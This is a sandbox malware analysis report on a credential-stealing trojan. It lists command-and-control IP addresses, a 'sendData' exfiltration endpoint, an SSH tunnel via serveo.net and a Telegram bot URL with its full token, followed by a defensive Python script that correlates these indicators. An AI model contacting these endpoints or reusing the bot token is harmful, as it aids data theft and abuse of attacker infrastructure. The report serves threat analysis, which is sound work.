                                                                                                http://45.184.180.226:80800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://185.217.98.121:80800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://8.219.110.16:99990LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459D3D000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A0CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234EDF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B17CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B6CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://185.253.7.60:8080/0LpFv1haTA.exe, 00000000.00000002.2105344056.00000194599E7000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234B77000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B146F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B36F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB509F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://47.96.78.224:80800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://node.trezor.io0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://95.216.147.179:800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://185.253.7.60:8080//sendData0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B16AB000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B5AB000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB52DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://188.120.242.78:88170LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://154.9.207.142:4430LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://127.0.0.1:21325/enumerate0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://167.99.138.249:8080/%4B%37%49%76%48%5F%61%6C%66%6F%6E%73%40%30%35%31%38%32%39%5F%72%65%70%6F%0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://upx.sf.netAmcache.hve.36.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net/ssh.exe, 00000018.00000002.4563439205.0000020D735FC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000002.4563439205.0000020D73660000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000003.3449996939.0000020D735FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://127.0.0.1:7634/0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, helloworld.txt.13.drfalse
                                                                                                                              unknown
                                                                                                                              http://ip-api.com/line?fields=query0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://159.203.174.113:80900LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.ecosia.org/newtab/0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://185.217.98.121:4430LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://185.253.7.60:8080/80LpFv1haTA.exe, 00000000.00000002.2105344056.00000194599E7000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234B77000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B146F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B36F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB509F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://ac.ecosia.org/autocomplete?q=0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://116.202.101.219:80800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&u0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://46.51.231.213:4430LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                              unknown
                                                                                                                                              http://127.0.0.1:0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://38.60.191.38:80 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://167.99.138.249:8080/K7IvH_user | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578 | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://support.mozilla.org/product | 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://api.tele (truncated string) | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
http://206.189.109.146:80 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://schemas.xmlsoap.org/wsdl/ | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1796000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B696000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634//8f7482867cc6a5aec99ead5e72d7016e.serveo.net | 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://45.82.65.63:80 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip | 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://41.87.207.180:9090 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://api.telegram.org | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://3.12.151.253:80 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.120.242.78 | unknown | Russian Federation | 29182 | THEFIRST-ASRU | true
185.80.128.17 | unknown | Lithuania | 61053 | VPSNET-ASLT | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
206.189.109.146 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
193.149.187.135 | unknown | Denmark | 15411 | DANISCODK | true
167.99.138.249 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
185.253.7.60 | unknown | Russian Federation | 206352 | MEDIACONNECTIVEGB | true
45.82.65.63 | unknown | United Kingdom | 208862 | SIRINFO-ASIT | true
138.68.79.95 | serveo.net | United States | 14061 | DIGITALOCEAN-ASNUS | false

IP
127.0.0.1
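The two tables above list, separately, the URLs carved from process memory and the hosts the sandbox actually saw the sample reach. The script below joins them so that embedded C2 candidates that produced traffic can be told apart from strings that never did. It is an added example for this report, not Joe Sandbox output and not code from the sample; the URL and IP rows are copied from the tables above (the Telegram bot URL is left out on purpose), and the field names in the result records are this example's own.

```python
"""Join the URLs carved from process memory with the hosts the sandbox saw
the sample contact, so embedded C2 candidates can be separated from strings
that never produced traffic.

Added example for this report; not part of the Joe Sandbox output and not
code from the analysed sample. Rows are copied from the two tables above
(the Telegram bot URL is left out on purpose); the record field names are
this example's own.
"""
import ipaddress
from urllib.parse import urlsplit

# Name and Malicious columns of the URL table above.
MEMORY_URLS = [
    ("http://38.60.191.38:80", False),
    ("http://167.99.138.249:8080/K7IvH_user", False),
    ("https://support.mozilla.org/product", False),
    ("http://206.189.109.146:80", False),
    ("http://schemas.xmlsoap.org/wsdl/", False),
    ("http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634"
     "//8f7482867cc6a5aec99ead5e72d7016e.serveo.net", False),
    ("http://45.82.65.63:80", False),
    ("https://github.com/PowerShell/Win32-OpenSSH/releases/download/"
     "v9.2.2.0p1-Beta/OpenSSH-Win32.zip", False),
    ("http://41.87.207.180:9090", False),
    ("http://api.telegram.org", False),
    ("http://3.12.151.253:80", False),
]

# IP, Domain and Malicious columns of the contacted-IP table above.
CONTACTED = {
    "188.120.242.78": ("unknown", True),
    "185.80.128.17": ("unknown", False),
    "208.95.112.1": ("ip-api.com", False),
    "149.154.167.220": ("api.telegram.org", True),
    "206.189.109.146": ("unknown", True),
    "193.149.187.135": ("unknown", True),
    "167.99.138.249": ("unknown", True),
    "185.253.7.60": ("unknown", True),
    "45.82.65.63": ("unknown", True),
    "138.68.79.95": ("serveo.net", False),
}


def parse_url(url):
    """Return (host, port, is_raw_ip); the port defaults from the scheme."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        ipaddress.ip_address(host)
        is_raw_ip = True
    except ValueError:
        is_raw_ip = False
    return host, port, is_raw_ip


def defang(url):
    """Make a URL safe to paste into a ticket: hxxp scheme, bracketed dots."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def correlate(memory_urls=MEMORY_URLS, contacted=CONTACTED):
    """Attach to each embedded URL the contacted IP it resolves to, if any.

    Raw-IP hosts are matched exactly; domain hosts match a contacted entry
    whose domain equals the host or is a parent of it (serveo.net covers
    the per-tunnel serveo subdomain).
    """
    by_domain = {dom: ip for ip, (dom, _) in contacted.items() if dom != "unknown"}
    results = []
    for url, url_flag in memory_urls:
        host, port, is_raw_ip = parse_url(url)
        hit = None
        if is_raw_ip:
            hit = host if host in contacted else None
        else:
            for dom, ip in by_domain.items():
                if host == dom or host.endswith("." + dom):
                    hit = ip
                    break
        if hit is None:
            verdict = "embedded only"
        elif contacted[hit][1]:
            verdict = "contacted, sandbox flagged malicious"
        else:
            verdict = "contacted, not flagged"
        results.append({
            "url": url, "host": host, "port": port, "raw_ip": is_raw_ip,
            "url_flag": url_flag, "contacted_ip": hit, "verdict": verdict,
        })
    return results


if __name__ == "__main__":
    for rec in sorted(correlate(), key=lambda r: r["verdict"]):
        print(f"{rec['verdict']:<36} {defang(rec['url'])}")
```

The join exposes a discrepancy worth keeping in mind when reading such reports: the URL table marks http://167.99.138.249:8080/K7IvH_user, http://206.189.109.146:80 and http://45.82.65.63:80 as not malicious, yet the same three addresses were contacted during the run and are flagged malicious in the IP table, so the per-URL flag is not a verdict about the host. 38.60.191.38, 41.87.207.180 and 3.12.151.253 were embedded with the same :80 pattern but never reached, which makes them fallback candidates to block rather than confirmed C2.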
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520806
Start date and time: 2024-09-27 23:26:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0LpFv1haTA.exe (renamed because the original name is a hash value)
Original Sample Name: 1bafb4856a31ae27271fbd2ee1574a4f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@68/17@3/11
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 122
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
